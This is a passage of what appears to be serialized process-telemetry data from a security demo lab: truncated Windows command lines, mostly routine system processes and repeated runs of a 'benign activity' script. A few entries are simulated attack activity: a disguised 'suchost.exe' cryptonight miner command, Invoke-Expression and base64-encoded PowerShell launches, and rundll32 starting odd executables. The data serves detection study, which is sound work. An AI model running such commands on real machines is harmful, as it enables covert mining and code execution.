-Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"nan\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 2\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microso...\",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Ge...\",\".\\\\powershell  -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIklu...\",\"cmd  /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /22284\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 0 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -15855\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 /25041\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11793\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\26415\\\\9105.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 14 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484 /10137\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15720\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 14 \",\"rundll32  \\\\15840\\\\26443.exe\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 28 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\18091\\\\18975.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 /21875\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353 /21160\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14766\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\29395\\\\14699.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\24535\\\\23154.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592 /10339\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25460\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\12420\\\\28156.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 29 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 8 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 6 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /9352\",\"ping  127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /32625\",\"ping  127.0.0.1 -n 9 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -9090\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009 /26500\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14236\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\6038\\\\18193.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"ping  127.0.0.1 -n 22 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 2...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 11 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /17352\",\"ping  127.0.0.1 -n 18 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -22746\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357 /19904\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6768\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\557\\\\12356.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 16 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 12 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 6 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\28294\\\\1236.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBeni...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"cmd  /c echo Any questions about the commands executed here then please...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microso...\",\"ping  127.0.0.1 -n 24 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672 /6837\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" ...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 /15106\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22743\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"rundll32  \\\\24845\\\\2750.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 24 \",\"rundll32  \\\\32641\\\\32360.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinB...\",\"ping  127.0.0.1 -n 24 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 24 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenig...\",\"ping  127.0.0.1 -n 24 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBeni...\",\"ping  127.0.0.1 -n 11 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"ping  127.0.0.1 -n 20 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignAc...\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignA...\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsou...\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmd...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua 